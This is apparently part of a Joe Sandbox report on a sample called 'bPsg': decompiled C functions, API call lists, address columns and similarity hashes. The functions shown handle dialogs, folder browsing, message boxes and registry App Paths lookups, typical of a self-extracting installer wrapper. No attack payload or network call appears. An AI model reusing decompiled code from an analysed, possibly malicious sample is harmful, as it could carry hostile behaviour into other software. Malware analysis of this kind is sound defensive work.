                                                                        0x00f33671
                                                                        0x00f33677
                                                                        0x00000000
                                                                        0x00f33677
                                                                        0x00f33504
                                                                        0x00f33506
                                                                        0x00f33507
                                                                        0x00f3350c
                                                                        0x00f3365b
                                                                        0x00f3365f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f33661
                                                                        0x00f33512
                                                                        0x00f33515
                                                                        0x00f335be
                                                                        0x00f335c1
                                                                        0x00f335d1
                                                                        0x00f335d8
                                                                        0x00f335de
                                                                        0x00f335f8
                                                                        0x00f33617
                                                                        0x00f33617
                                                                        0x00f33623
                                                                        0x00f33637
                                                                        0x00f3363d
                                                                        0x00f33642
                                                                        0x00f33644
                                                                        0x00000000
                                                                        0x00f33646
                                                                        0x00f33652
                                                                        0x00f33657
                                                                        0x00f33658
                                                                        0x00000000
                                                                        0x00f33658
                                                                        0x00f33644
                                                                        0x00f3351b
                                                                        0x00f3351d
                                                                        0x00f3354f
                                                                        0x00f33553
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f3355f
                                                                        0x00f33565
                                                                        0x00f3357c
                                                                        0x00f33581
                                                                        0x00f33584
                                                                        0x00f3359b
                                                                        0x00f335a1
                                                                        0x00f335a7
                                                                        0x00f335ad
                                                                        0x00f335b3
                                                                        0x00f335b8
                                                                        0x00000000
                                                                        0x00f335b8
                                                                        0x00f33586
                                                                        0x00f33588
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f33590
                                                                        0x00000000
                                                                        0x00f33590
                                                                        0x00f33524
                                                                        0x00f33535
                                                                        0x00f33541
                                                                        0x00000000
                                                                        0x00f33549
                                                                        0x00000000

                                                                        APIs
                                                                        • TerminateThread.KERNEL32(00000000), ref: 00F33535
                                                                        • EndDialog.USER32(?,?), ref: 00F33541
                                                                        • ResetEvent.KERNEL32 ref: 00F3355F
                                                                        • SetEvent.KERNEL32(00F31140,00000000,00000020,00000004), ref: 00F33590
                                                                        • GetDesktopWindow.USER32 ref: 00F335C7
                                                                        • GetDlgItem.USER32(?,0000083B), ref: 00F335F1
                                                                        • SendMessageA.USER32(00000000), ref: 00F335F8
                                                                        • GetDlgItem.USER32(?,0000083B), ref: 00F33610
                                                                        • SendMessageA.USER32(00000000), ref: 00F33617
                                                                        • SetWindowTextA.USER32(?,lenta), ref: 00F33623
                                                                        • CreateThread.KERNEL32 ref: 00F33637
                                                                        • EndDialog.USER32(?,00000000), ref: 00F33671
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                        • String ID: lenta
                                                                        • API String ID: 2406144884-2780258678
                                                                        • Opcode ID: 8ae3221b9ad09de77eac41210e7474c1cbc960aac1ab722f2e1baf96a946acb0
                                                                        • Instruction ID: e5d65336f70d045394af8082bb6ed7325b4342abb436ff948f009cb2feffcaf8
                                                                        • Opcode Fuzzy Hash: 8ae3221b9ad09de77eac41210e7474c1cbc960aac1ab722f2e1baf96a946acb0
                                                                        • Instruction Fuzzy Hash: EC31E331640309BFD760AF26EC0EE2B3A6AE785B71F144529F642952B0CB799A01FF51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 50%
                                                                        			E00F34224(char __ecx) {
                                                                        				char* _v8;
                                                                        				_Unknown_base(*)()* _v12;
                                                                        				_Unknown_base(*)()* _v16;
                                                                        				_Unknown_base(*)()* _v20;
                                                                        				char* _v28;
                                                                        				intOrPtr _v32;
                                                                        				intOrPtr _v36;
                                                                        				intOrPtr _v40;
                                                                        				char _v44;
                                                                        				char _v48;
                                                                        				char _v52;
                                                                        				_Unknown_base(*)()* _t26;
                                                                        				_Unknown_base(*)()* _t28;
                                                                        				_Unknown_base(*)()* _t29;
                                                                        				_Unknown_base(*)()* _t32;
                                                                        				char _t42;
                                                                        				char* _t44;
                                                                        				char* _t61;
                                                                        				void* _t63;
                                                                        				char* _t65;
                                                                        				struct HINSTANCE__* _t66;
                                                                        				char _t67;
                                                                        				void* _t71;
                                                                        				char _t76;
                                                                        				intOrPtr _t85;
                                                                        
                                                                        				_t67 = __ecx;
                                                                        				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                        				if(_t66 == 0) {
                                                                        					_t63 = 0x4c2;
                                                                        					L22:
                                                                        					E00F344B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                        					return 0;
                                                                        				}
                                                                        				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                        				_v12 = _t26;
                                                                        				if(_t26 == 0) {
                                                                        					L20:
                                                                        					FreeLibrary(_t66);
                                                                        					_t63 = 0x4c1;
                                                                        					goto L22;
                                                                        				}
                                                                        				_t28 = GetProcAddress(_t66, 0xc3);
                                                                        				_v20 = _t28;
                                                                        				if(_t28 == 0) {
                                                                        					goto L20;
                                                                        				}
                                                                        				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                        				_v16 = _t29;
                                                                        				if(_t29 == 0) {
                                                                        					goto L20;
                                                                        				}
                                                                        				_t76 =  *0xf388c0; // 0x0
                                                                        				if(_t76 != 0) {
                                                                        					L10:
                                                                        					 *0xf387a0 = 0;
                                                                        					_v52 = _t67;
                                                                        					_v48 = 0;
                                                                        					_v44 = 0;
                                                                        					_v40 = 0xf38598;
                                                                        					_v36 = 1;
                                                                        					_v32 = E00F34200;
                                                                        					_v28 = 0xf388c0;
                                                                        					 *0xf3a288( &_v52);
                                                                        					_t32 =  *_v12();
                                                                        					if(_t71 != _t71) {
                                                                        						asm("int 0x29");
                                                                        					}
                                                                        					_v12 = _t32;
                                                                        					if(_t32 != 0) {
                                                                        						 *0xf3a288(_t32, 0xf388c0);
                                                                        						 *_v16();
                                                                        						if(_t71 != _t71) {
                                                                        							asm("int 0x29");
                                                                        						}
                                                                        						if( *0xf388c0 != 0) {
                                                                        							E00F31680(0xf387a0, 0x104, 0xf388c0);
                                                                        						}
                                                                        						 *0xf3a288(_v12);
                                                                        						 *_v20();
                                                                        						if(_t71 != _t71) {
                                                                        							asm("int 0x29");
                                                                        						}
                                                                        					}
                                                                        					FreeLibrary(_t66);
                                                                        					_t85 =  *0xf387a0; // 0x0
                                                                        					return 0 | _t85 != 0x00000000;
                                                                        				} else {
                                                                        					GetTempPathA(0x104, 0xf388c0);
                                                                        					_t61 = 0xf388c0;
                                                                        					_t4 =  &(_t61[1]); // 0xf388c1
                                                                        					_t65 = _t4;
                                                                        					do {
                                                                        						_t42 =  *_t61;
                                                                        						_t61 =  &(_t61[1]);
                                                                        					} while (_t42 != 0);
                                                                        					_t5 = _t61 - _t65 + 0xf388c0; // 0x1e71181
                                                                        					_t44 = CharPrevA(0xf388c0, _t5);
                                                                        					_v8 = _t44;
                                                                        					if( *_t44 == 0x5c &&  *(CharPrevA(0xf388c0, _t44)) != 0x3a) {
                                                                        						 *_v8 = 0;
                                                                        					}
                                                                        					goto L10;
                                                                        				}
                                                                        			}




























                                                                        0x00f34234
                                                                        0x00f3423c
                                                                        0x00f34240
                                                                        0x00f343b2
                                                                        0x00f343b7
                                                                        0x00f343c0
                                                                        0x00000000
                                                                        0x00f343c5
                                                                        0x00f3424c
                                                                        0x00f34252
                                                                        0x00f34257
                                                                        0x00f343a4
                                                                        0x00f343a5
                                                                        0x00f343ab
                                                                        0x00000000
                                                                        0x00f343ab
                                                                        0x00f34263
                                                                        0x00f34269
                                                                        0x00f3426e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f3427a
                                                                        0x00f34280
                                                                        0x00f34285
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f3428d
                                                                        0x00f34293
                                                                        0x00f342e6
                                                                        0x00f342e9
                                                                        0x00f342ef
                                                                        0x00f342f4
                                                                        0x00f342f7
                                                                        0x00f34300
                                                                        0x00f34307
                                                                        0x00f3430e
                                                                        0x00f34315
                                                                        0x00f3431c
                                                                        0x00f34322
                                                                        0x00f34326
                                                                        0x00f3432d
                                                                        0x00f3432d
                                                                        0x00f3432f
                                                                        0x00f34334
                                                                        0x00f34343
                                                                        0x00f34349
                                                                        0x00f3434d
                                                                        0x00f34354
                                                                        0x00f34354
                                                                        0x00f3435d
                                                                        0x00f3436e
                                                                        0x00f3436e
                                                                        0x00f3437d
                                                                        0x00f34383
                                                                        0x00f34387
                                                                        0x00f3438e
                                                                        0x00f3438e
                                                                        0x00f34387
                                                                        0x00f34391
                                                                        0x00f34399
                                                                        0x00000000
                                                                        0x00f34295
                                                                        0x00f3429f
                                                                        0x00f342a5
                                                                        0x00f342aa
                                                                        0x00f342aa
                                                                        0x00f342ad
                                                                        0x00f342ad
                                                                        0x00f342af
                                                                        0x00f342b0
                                                                        0x00f342b6
                                                                        0x00f342c2
                                                                        0x00f342c8
                                                                        0x00f342ce
                                                                        0x00f342e4
                                                                        0x00f342e4
                                                                        0x00000000
                                                                        0x00f342ce

                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00F34236
                                                                        • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 00F3424C
                                                                        • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00F34263
                                                                        • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 00F3427A
                                                                        • GetTempPathA.KERNEL32(00000104,00F388C0,?,00000001), ref: 00F3429F
                                                                        • CharPrevA.USER32(00F388C0,01E71181,?,00000001), ref: 00F342C2
                                                                        • CharPrevA.USER32(00F388C0,00000000,?,00000001), ref: 00F342D6
                                                                        • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00F34391
                                                                        • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00F343A5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                        • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                        • API String ID: 1865808269-1731843650
                                                                        • Opcode ID: 1b72aaee4004ad42a2f5965db0c0e01ab37691884ff4b7e9164ced38c372816d
                                                                        • Instruction ID: 5c13aad0da75bb32f90d2977fef2a1672f6f1a7ce62394276944fa9555a52c85
                                                                        • Opcode Fuzzy Hash: 1b72aaee4004ad42a2f5965db0c0e01ab37691884ff4b7e9164ced38c372816d
                                                                        • Instruction Fuzzy Hash: FE41D674E00308AFD711AB65DC88A6EBBB5EB453B4F040169F981A3351CB78AC02F761
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E00F344B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                        				signed int _v8;
                                                                        				char _v64;
                                                                        				char _v576;
                                                                        				void* _v580;
                                                                        				struct HWND__* _v584;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t34;
                                                                        				void* _t37;
                                                                        				signed int _t39;
                                                                        				intOrPtr _t43;
                                                                        				signed int _t44;
                                                                        				signed int _t49;
                                                                        				signed int _t52;
                                                                        				void* _t54;
                                                                        				intOrPtr _t55;
                                                                        				intOrPtr _t58;
                                                                        				intOrPtr _t59;
                                                                        				int _t64;
                                                                        				void* _t66;
                                                                        				intOrPtr* _t67;
                                                                        				signed int _t69;
                                                                        				intOrPtr* _t73;
                                                                        				intOrPtr* _t76;
                                                                        				intOrPtr* _t77;
                                                                        				void* _t80;
                                                                        				void* _t81;
                                                                        				void* _t82;
                                                                        				intOrPtr* _t84;
                                                                        				void* _t85;
                                                                        				signed int _t89;
                                                                        
                                                                        				_t75 = __edx;
                                                                        				_t34 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t34 ^ _t89;
                                                                        				_v584 = __ecx;
                                                                        				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                        				_t67 = _a4;
                                                                        				_t69 = 0xd;
                                                                        				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                        				_t80 = _t83 + _t69 + _t69;
                                                                        				_v580 = _t37;
                                                                        				asm("movsb");
                                                                        				if(( *0xf38a38 & 0x00000001) != 0) {
                                                                        					_t39 = 1;
                                                                        				} else {
                                                                        					_v576 = 0;
                                                                        					LoadStringA( *0xf39a3c, _t75,  &_v576, 0x200);
                                                                        					if(_v576 != 0) {
                                                                        						_t73 =  &_v576;
                                                                        						_t16 = _t73 + 1; // 0x1
                                                                        						_t75 = _t16;
                                                                        						do {
                                                                        							_t43 =  *_t73;
                                                                        							_t73 = _t73 + 1;
                                                                        						} while (_t43 != 0);
                                                                        						_t84 = _v580;
                                                                        						_t74 = _t73 - _t75;
                                                                        						if(_t84 == 0) {
                                                                        							if(_t67 == 0) {
                                                                        								_t27 = _t74 + 1; // 0x2
                                                                        								_t83 = _t27;
                                                                        								_t44 = LocalAlloc(0x40, _t83);
                                                                        								_t80 = _t44;
                                                                        								if(_t80 == 0) {
                                                                        									goto L6;
                                                                        								} else {
                                                                        									_t75 = _t83;
                                                                        									_t74 = _t80;
                                                                        									E00F31680(_t80, _t83,  &_v576);
                                                                        									goto L23;
                                                                        								}
                                                                        							} else {
                                                                        								_t76 = _t67;
                                                                        								_t24 = _t76 + 1; // 0x1
                                                                        								_t85 = _t24;
                                                                        								do {
                                                                        									_t55 =  *_t76;
                                                                        									_t76 = _t76 + 1;
                                                                        								} while (_t55 != 0);
                                                                        								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                        								_t83 = _t25 + _t74;
                                                                        								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                        								_t80 = _t44;
                                                                        								if(_t80 == 0) {
                                                                        									goto L6;
                                                                        								} else {
                                                                        									E00F3171E(_t80, _t83,  &_v576, _t67);
                                                                        									goto L23;
                                                                        								}
                                                                        							}
                                                                        						} else {
                                                                        							_t77 = _t67;
                                                                        							_t18 = _t77 + 1; // 0x1
                                                                        							_t81 = _t18;
                                                                        							do {
                                                                        								_t58 =  *_t77;
                                                                        								_t77 = _t77 + 1;
                                                                        							} while (_t58 != 0);
                                                                        							_t75 = _t77 - _t81;
                                                                        							_t82 = _t84 + 1;
                                                                        							do {
                                                                        								_t59 =  *_t84;
                                                                        								_t84 = _t84 + 1;
                                                                        							} while (_t59 != 0);
                                                                        							_t21 = _t74 + 0x64; // 0x65
                                                                        							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                        							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                        							_t80 = _t44;
                                                                        							if(_t80 == 0) {
                                                                        								goto L6;
                                                                        							} else {
                                                                        								_push(_v580);
                                                                        								E00F3171E(_t80, _t83,  &_v576, _t67);
                                                                        								L23:
                                                                        								MessageBeep(_a12);
                                                                        								if(E00F3681F(_t67) == 0) {
                                                                        									L25:
                                                                        									_t49 = 0x10000;
                                                                        								} else {
                                                                        									_t54 = E00F367C9(_t74, _t74);
                                                                        									_t49 = 0x190000;
                                                                        									if(_t54 == 0) {
                                                                        										goto L25;
                                                                        									}
                                                                        								}
                                                                        								_t52 = MessageBoxA(_v584, _t80, "lenta", _t49 | _a12 | _a16);
                                                                        								_t83 = _t52;
                                                                        								LocalFree(_t80);
                                                                        								_t39 = _t52;
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						if(E00F3681F(_t67) == 0) {
                                                                        							L4:
                                                                        							_t64 = 0x10010;
                                                                        						} else {
                                                                        							_t66 = E00F367C9(0, 0);
                                                                        							_t64 = 0x190010;
                                                                        							if(_t66 == 0) {
                                                                        								goto L4;
                                                                        							}
                                                                        						}
                                                                        						_t44 = MessageBoxA(_v584,  &_v64, "lenta", _t64);
                                                                        						L6:
                                                                        						_t39 = _t44 | 0xffffffff;
                                                                        					}
                                                                        				}
                                                                        				return E00F36CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                        			}



































                                                                        0x00f344b9
                                                                        0x00f344c4
                                                                        0x00f344cb
                                                                        0x00f344d8
                                                                        0x00f344e4
                                                                        0x00f344eb
                                                                        0x00f344ee
                                                                        0x00f344ef
                                                                        0x00f344ef
                                                                        0x00f344f1
                                                                        0x00f344f7
                                                                        0x00f344f8
                                                                        0x00f3467b
                                                                        0x00f344fe
                                                                        0x00f34509
                                                                        0x00f34518
                                                                        0x00f34525
                                                                        0x00f34562
                                                                        0x00f34568
                                                                        0x00f34568
                                                                        0x00f3456b
                                                                        0x00f3456b
                                                                        0x00f3456d
                                                                        0x00f3456e
                                                                        0x00f34572
                                                                        0x00f34578
                                                                        0x00f3457c
                                                                        0x00f345cb
                                                                        0x00f34607
                                                                        0x00f34607
                                                                        0x00f3460d
                                                                        0x00f34613
                                                                        0x00f34617
                                                                        0x00000000
                                                                        0x00f3461d
                                                                        0x00f34623
                                                                        0x00f34626
                                                                        0x00f34628
                                                                        0x00000000
                                                                        0x00f34628
                                                                        0x00f345cd
                                                                        0x00f345cd
                                                                        0x00f345cf
                                                                        0x00f345cf
                                                                        0x00f345d2
                                                                        0x00f345d2
                                                                        0x00f345d4
                                                                        0x00f345d5
                                                                        0x00f345db
                                                                        0x00f345de
                                                                        0x00f345e3
                                                                        0x00f345e9
                                                                        0x00f345ed
                                                                        0x00000000
                                                                        0x00f345f3
                                                                        0x00f345fd
                                                                        0x00000000
                                                                        0x00f34602
                                                                        0x00f345ed
                                                                        0x00f3457e
                                                                        0x00f3457e
                                                                        0x00f34580
                                                                        0x00f34580
                                                                        0x00f34583
                                                                        0x00f34583
                                                                        0x00f34585
                                                                        0x00f34586
                                                                        0x00f3458a
                                                                        0x00f3458c
                                                                        0x00f3458f
                                                                        0x00f3458f
                                                                        0x00f34591
                                                                        0x00f34592
                                                                        0x00f3459b
                                                                        0x00f3459e
                                                                        0x00f345a3
                                                                        0x00f345a9
                                                                        0x00f345ad
                                                                        0x00000000
                                                                        0x00f345af
                                                                        0x00f345af
                                                                        0x00f345bf
                                                                        0x00f3462d
                                                                        0x00f34630
                                                                        0x00f3463d
                                                                        0x00f3464e
                                                                        0x00f3464e
                                                                        0x00f3463f
                                                                        0x00f34640
                                                                        0x00f34647
                                                                        0x00f3464c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f3464c
                                                                        0x00f34666
                                                                        0x00f3466d
                                                                        0x00f3466f
                                                                        0x00f34675
                                                                        0x00f34675
                                                                        0x00f345ad
                                                                        0x00f34527
                                                                        0x00f3452e
                                                                        0x00f3453f
                                                                        0x00f3453f
                                                                        0x00f34530
                                                                        0x00f34531
                                                                        0x00f34538
                                                                        0x00f3453d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f3453d
                                                                        0x00f34554
                                                                        0x00f3455a
                                                                        0x00f3455a
                                                                        0x00f3455a
                                                                        0x00f34525
                                                                        0x00f3468c

                                                                        APIs
                                                                        • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F34518
                                                                        • MessageBoxA.USER32(?,?,lenta,00010010), ref: 00F34554
                                                                        • LocalAlloc.KERNEL32(00000040,00000065), ref: 00F345A3
                                                                        • LocalAlloc.KERNEL32(00000040,00000065), ref: 00F345E3
                                                                        • LocalAlloc.KERNEL32(00000040,00000002), ref: 00F3460D
                                                                        • MessageBeep.USER32(00000000), ref: 00F34630
                                                                        • MessageBoxA.USER32(?,00000000,lenta,00000000), ref: 00F34666
                                                                        • LocalFree.KERNEL32(00000000), ref: 00F3466F
                                                                          • Part of subcall function 00F3681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00F3686E
                                                                          • Part of subcall function 00F3681F: GetSystemMetrics.USER32(0000004A), ref: 00F368A7
                                                                          • Part of subcall function 00F3681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00F368CC
                                                                          • Part of subcall function 00F3681F: RegQueryValueExA.ADVAPI32(?,00F31140,00000000,?,?,0000000C), ref: 00F368F4
                                                                          • Part of subcall function 00F3681F: RegCloseKey.ADVAPI32(?), ref: 00F36902
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                        • String ID: LoadString() Error. Could not load string resource.$lenta
                                                                        • API String ID: 3244514340-1000497449
                                                                        • Opcode ID: 8ce04227b2f42e6774088bc46ddb930864afa88a332b2f22be22004d0a3a80d4
                                                                        • Instruction ID: 13de7fdb69d6dfaeb129699e921803870fb4ad11e88dc7136411d482a87dc128
                                                                        • Opcode Fuzzy Hash: 8ce04227b2f42e6774088bc46ddb930864afa88a332b2f22be22004d0a3a80d4
                                                                        • Instruction Fuzzy Hash: 12510672D00219ABDB21AF28CC49BAABB69EF45330F044194FD59A7241DB75FE05EB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E00F32773(CHAR* __ecx, char* _a4) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				char _v269;
                                                                        				CHAR* _v276;
                                                                        				int _v280;
                                                                        				void* _v284;
                                                                        				int _v288;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t23;
                                                                        				intOrPtr _t34;
                                                                        				int _t45;
                                                                        				int* _t50;
                                                                        				CHAR* _t52;
                                                                        				CHAR* _t61;
                                                                        				char* _t62;
                                                                        				int _t63;
                                                                        				CHAR* _t64;
                                                                        				signed int _t65;
                                                                        
                                                                        				_t52 = __ecx;
                                                                        				_t23 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t23 ^ _t65;
                                                                        				_t62 = _a4;
                                                                        				_t50 = 0;
                                                                        				_t61 = __ecx;
                                                                        				_v276 = _t62;
                                                                        				 *((char*)(__ecx)) = 0;
                                                                        				if( *_t62 != 0x23) {
                                                                        					_t63 = 0x104;
                                                                        					goto L14;
                                                                        				} else {
                                                                        					_t64 = _t62 + 1;
                                                                        					_v269 = CharUpperA( *_t64);
                                                                        					_v276 = CharNextA(CharNextA(_t64));
                                                                        					_t63 = 0x104;
                                                                        					_t34 = _v269;
                                                                        					if(_t34 == 0x53) {
                                                                        						L14:
                                                                        						GetSystemDirectoryA(_t61, _t63);
                                                                        						goto L15;
                                                                        					} else {
                                                                        						if(_t34 == 0x57) {
                                                                        							GetWindowsDirectoryA(_t61, 0x104);
                                                                        							goto L16;
                                                                        						} else {
                                                                        							_push(_t52);
                                                                        							_v288 = 0x104;
                                                                        							E00F31781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                        							_t59 = 0x104;
                                                                        							E00F3658A( &_v268, 0x104, _v276);
                                                                        							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                        								L16:
                                                                        								_t59 = _t63;
                                                                        								E00F3658A(_t61, _t63, _v276);
                                                                        							} else {
                                                                        								if(RegQueryValueExA(_v284, 0xf31140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                        									_t45 = _v280;
                                                                        									if(_t45 != 2) {
                                                                        										L9:
                                                                        										if(_t45 == 1) {
                                                                        											goto L10;
                                                                        										}
                                                                        									} else {
                                                                        										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                        											_t45 = _v280;
                                                                        											goto L9;
                                                                        										} else {
                                                                        											_t59 = 0x104;
                                                                        											E00F31680(_t61, 0x104,  &_v268);
                                                                        											L10:
                                                                        											_t50 = 1;
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        								RegCloseKey(_v284);
                                                                        								L15:
                                                                        								if(_t50 == 0) {
                                                                        									goto L16;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return E00F36CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                        			}























                                                                        0x00f32773
                                                                        0x00f3277e
                                                                        0x00f32785
                                                                        0x00f3278a
                                                                        0x00f3278d
                                                                        0x00f32790
                                                                        0x00f32792
                                                                        0x00f32798
                                                                        0x00f3279d
                                                                        0x00f328b2
                                                                        0x00000000
                                                                        0x00f327a3
                                                                        0x00f327a3
                                                                        0x00f327af
                                                                        0x00f327c2
                                                                        0x00f327c8
                                                                        0x00f327cd
                                                                        0x00f327d5
                                                                        0x00f328b7
                                                                        0x00f328b9
                                                                        0x00000000
                                                                        0x00f327db
                                                                        0x00f327dd
                                                                        0x00f328aa
                                                                        0x00000000
                                                                        0x00f327e3
                                                                        0x00f327e3
                                                                        0x00f327ec
                                                                        0x00f327f8
                                                                        0x00f32803
                                                                        0x00f3280b
                                                                        0x00f32831
                                                                        0x00f328c3
                                                                        0x00f328c9
                                                                        0x00f328cd
                                                                        0x00f32837
                                                                        0x00f3285a
                                                                        0x00f3285c
                                                                        0x00f32865
                                                                        0x00f32892
                                                                        0x00f32895
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f32867
                                                                        0x00f32878
                                                                        0x00f3288c
                                                                        0x00000000
                                                                        0x00f3287a
                                                                        0x00f32880
                                                                        0x00f32885
                                                                        0x00f32897
                                                                        0x00f32899
                                                                        0x00f32899
                                                                        0x00f32878
                                                                        0x00f32865
                                                                        0x00f328a0
                                                                        0x00f328bf
                                                                        0x00f328c1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f328c1
                                                                        0x00f32831
                                                                        0x00f327dd
                                                                        0x00f327d5
                                                                        0x00f328e5

                                                                        APIs
                                                                        • CharUpperA.USER32(C69E30F7,00000000,00000000,00000000), ref: 00F327A8
                                                                        • CharNextA.USER32(0000054D), ref: 00F327B5
                                                                        • CharNextA.USER32(00000000), ref: 00F327BC
                                                                        • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F32829
                                                                        • RegQueryValueExA.ADVAPI32(?,00F31140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F32852
                                                                        • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F32870
                                                                        • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F328A0
                                                                        • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 00F328AA
                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00F328B9
                                                                        Strings
                                                                        • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00F327E4
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                        • API String ID: 2659952014-2428544900
                                                                        • Opcode ID: 2e4bb52508a7667bd8c2968e707f2264b75d05523e20656d2da9f328e3568bb7
